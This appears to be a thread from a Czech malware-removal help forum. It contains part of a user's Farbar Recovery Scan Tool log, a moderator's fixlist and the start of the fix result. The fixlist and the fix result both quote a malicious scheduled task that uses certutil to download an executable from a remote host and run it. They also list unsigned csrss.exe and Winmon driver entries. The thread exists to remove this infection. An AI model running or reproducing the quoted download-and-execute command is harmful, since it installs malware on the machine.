FirewallRules: [{178817BF-A27F-4435-B34B-EEB2ECFB48E7}] => (Allow) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOptionsMgr.EXE (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{63563E85-64C7-44E9-BB6F-8669228E4EF9}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E5FB062C-8C90-4693-89F6-FB1FDBE0DE5B}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E3904F86-8649-41ED-8BE1-960F80CE1B03}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{2D08EE70-88F2-4649-8299-B182B79733E6}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{8A4FB251-5506-42DA-AB5C-14C992BB4DFE}] => (Allow) C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
FirewallRules: [{9D9FB80D-2A4F-444D-B2C1-818FF186B9B7}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{ABD7F869-8C07-4289-8160-327C6CF23E5A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Restore Points =========================
==================== Faulty Device Manager Devices ============
Name: Bluetooth Server
Description: Bluetooth Server
Class Guid: {34446e8e-37b4-4b16-9da6-bea2db33465a}
Manufacturer: Intel Corporation
Service: btmaux
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Name: WinmonProcessMonitor
Description: WinmonProcessMonitor
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: WinmonProcessMonitor
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
==================== Event log errors: ========================
Application errors:
==================
Error: (02/07/2020 08:51:17 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.
Error: (02/07/2020 08:51:17 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.
Error: (02/07/2020 08:51:17 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
Error: (02/07/2020 08:44:47 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Error: (02/07/2020 08:43:35 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.
Error: (02/07/2020 08:43:32 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.
Error: (02/07/2020 08:43:32 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
Error: (02/07/2020 08:39:15 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
System errors:
=============
Error: (02/07/2020 08:57:43 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.
Error: (02/07/2020 08:57:42 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.
Error: (02/07/2020 08:44:52 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Nasledujúce ovládače pre spustenie zavedenia alebo spustenie systému zlyhali pri načítaní:
cdrom
Error: (02/07/2020 08:43:39 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Spustenie služby Windows Media Player - služba zdieľania v sieti zlyhalo kvôli nasledujúcej chybe:
Pretože zlyhalo prihlásenie, službu sa nepodarilo spustiť.
Error: (02/07/2020 08:43:39 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: Službe WMPNetworkSvc sa nepodarilo s aktuálne nakonfigurovaným heslom prihlásiť ako NT AUTHORITY\NetworkService kvôli nasledujúcej chybe:
Požiadavka nie je podporovaná.
Ak chcete zabezpečiť správne nakonfigurovanie služby, použite modul Služby konzoly MMC (Microsoft Management Console).
Error: (02/07/2020 08:43:27 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: Modul WLAN Extensibility Module sa neočakávane zastavil.
Cesta k modulu: C:\Windows\System32\IWMSSvc.dll
Error: (02/07/2020 08:43:27 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: Modul WLAN Extensibility Module sa neočakávane zastavil.
Cesta k modulu: C:\Windows\System32\IWMSSvc.dll
Error: (02/07/2020 08:43:27 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: Modul WLAN Extensibility Module sa neočakávane zastavil.
Cesta k modulu: C:\Windows\System32\IWMSSvc.dll
Windows Defender:
===================================
Date: 2019-09-17 22:50:36.541
Description:
Windows Defender scan has been stopped before completion.
Scan ID:{D3AB2F47-DE50-48D7-A60C-9877224729C3}
Scan Type:AntiSpyware
Scan Parameters:Quick Scan
Date: 2018-07-04 22:05:48.863
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:1.271.442.0
Previous Signature Version:1.269.1075.0
Update Source:User
Signature Type:AntiSpyware
Update Type:Delta
Current Engine Version:1.1.15000.2
Previous Engine Version:1.1.14901.4
Error code:0x80070666
Error description:Už je nainštalovaná iná verzia produktu. Inštaláciu tejto verzie nemožno dokončiť. Ak chcete existujúcu verziu produktu nakonfigurovať alebo odstrániť, použite ovládací panel Pridať alebo odstrániť programy.
Date: 2018-07-04 22:05:48.863
Description:
Windows Defender has encountered an error trying to update the engine.
New Engine Version:1.1.15000.2
Previous Engine Version:1.1.14901.4
Update Source:User
Error Code:0x80070666
Error description:Už je nainštalovaná iná verzia produktu. Inštaláciu tejto verzie nemožno dokončiť. Ak chcete existujúcu verziu produktu nakonfigurovať alebo odstrániť, použite ovládací panel Pridať alebo odstrániť programy.
CodeIntegrity:
===================================
Date: 2020-02-07 20:39:10.913
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-02-07 20:39:10.897
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-02-06 20:58:11.850
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-02-06 20:58:11.835
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-01-26 22:55:16.111
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-01-26 22:55:16.096
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-01-26 22:55:01.178
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-01-26 22:55:01.147
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
BIOS: TOSHIBA 1.90 09/19/2014
Motherboard: TOSHIBA VG10S
Processor: Intel(R) Core(TM) i7-4700MQ CPU @ 2.40GHz
Percentage of memory in use: 38%
Total physical RAM: 8103.89 MB
Available physical RAM: 5005.23 MB
Total Virtual: 22102.04 MB
Available Virtual: 17834.01 MB
==================== Drives ================================
Drive c: (Windows 7) (Fixed) (Total:143.37 GB) (Free:13.22 GB) NTFS
Drive d: (Windows 10) (Fixed) (Total:94.4 GB) (Free:12.33 GB) NTFS
Drive e: (data) (Fixed) (Total:465.76 GB) (Free:24.75 GB) NTFS
\\?\Volume{fddfa42c-f3c0-11e7-944c-806e6f6e6963}\ (Vyhradené systémom) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
\\?\Volume{ff0173d9-491a-11ea-9cd7-806e6f6e6963}\ () (Fixed) (Total:0.61 GB) (Free:0.08 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 238.5 GB) (Disk ID: C14F8450)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=143.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=94.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=622 MB) - (Type=27)
==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 3C2BC5FC)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================
-
Rudy
- Site Admin
- Příspěvky: 118275
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Prosím o kontrolu logu FRST
Otevřte poznámkový blok a zkopírujte do něj:
Uložte na plochu jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.Start
CloseProcesses:
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CloudNet] => C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-02-07] (EpicNet Inc.) [File not signed] <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {28B0A694-674F-4F77-AE22-288A79215844} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bestblues.tech/app/app.exe C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe && C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe /31340 <==== ATTENTION
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
U3 MBAMService; no ImagePath
S3 WinmonFS; \??\C:\Windows\System32\drivers\WinmonFS.sys [X]
S1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]
C:\Windows\system32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE}
C:\Windows\system1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw
C:\Windows\system1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie
C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll -> No File
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [TCP Query User{9747B657-A166-43E8-831D-33F204BC2790}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [UDP Query User{23B54518-BFAE-44C0-BD71-1342B40C49A7}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [{36E5F241-C08F-46E0-9466-1BC748A813DD}] => (Allow) C:\Users\Jomko\AppData\Local\Temp\7zS4058\HP.EasyStart.exe No File
FirewallRules: [TCP Query User{65CCA3BC-5E01-4C02-8A65-D444D4094BDA}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [UDP Query User{5AA0508D-A7ED-409E-8567-CA6F25C48CC2}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{F9AB2B23-2AC6-4DE0-A7FB-1DB375AED956}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{72A5A12A-716B-4CFA-BD0C-3A90C219130B}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [TCP Query User{4218553C-8414-4FC1-AC03-AABE1168B85F}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [UDP Query User{B0D9DA1F-9B8B-4AB9-862B-90F0B455C8B4}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [{63563E85-64C7-44E9-BB6F-8669228E4EF9}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E5FB062C-8C90-4693-89F6-FB1FDBE0DE5B}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E3904F86-8649-41ED-8BE1-960F80CE1B03}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{2D08EE70-88F2-4649-8299-B182B79733E6}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
EmptyTemp:
End
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Prosím o kontrolu logu FRST
Fix result of Farbar Recovery Scan Tool (x64) Version: 02-02-2020 02
Ran by Jomko (07-02-2020 22:54:55) Run:1
Running from C:\Users\Jomko\Desktop
Loaded Profiles: Jomko (Available Profiles: Jomko)
Boot Mode: Normal
==============================================
fixlist content:
*****************
Start
CloseProcesses:
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CloudNet] => C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-02-07] (EpicNet Inc.) [File not signed] <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {28B0A694-674F-4F77-AE22-288A79215844} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bestblues.tech/app/app.exe C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe && C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe /31340 <==== ATTENTION
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
U3 MBAMService; no ImagePath
S3 WinmonFS; \??\C:\Windows\System32\drivers\WinmonFS.sys [X]
S1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]
C:\Windows\system32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE}
C:\Windows\system1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw
C:\Windows\system1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie
C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll -> No File
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [TCP Query User{9747B657-A166-43E8-831D-33F204BC2790}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [UDP Query User{23B54518-BFAE-44C0-BD71-1342B40C49A7}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [{36E5F241-C08F-46E0-9466-1BC748A813DD}] => (Allow) C:\Users\Jomko\AppData\Local\Temp\7zS4058\HP.EasyStart.exe No File
FirewallRules: [TCP Query User{65CCA3BC-5E01-4C02-8A65-D444D4094BDA}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [UDP Query User{5AA0508D-A7ED-409E-8567-CA6F25C48CC2}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{F9AB2B23-2AC6-4DE0-A7FB-1DB375AED956}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{72A5A12A-716B-4CFA-BD0C-3A90C219130B}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [TCP Query User{4218553C-8414-4FC1-AC03-AABE1168B85F}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [UDP Query User{B0D9DA1F-9B8B-4AB9-862B-90F0B455C8B4}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [{63563E85-64C7-44E9-BB6F-8669228E4EF9}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E5FB062C-8C90-4693-89F6-FB1FDBE0DE5B}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E3904F86-8649-41ED-8BE1-960F80CE1B03}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{2D08EE70-88F2-4649-8299-B182B79733E6}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
EmptyTemp:
End
*****************
Processes closed successfully.
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeanJavaUpdateSched" => removed successfully
"HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7un\\CloudNet" => removed successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{28B0A694-674F-4F77-AE22-288A79215844}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{28B0A694-674F-4F77-AE22-288A79215844}" => removed successfully
C:\Windows\System32\Tasks\ScheduledUpdate => moved successfully
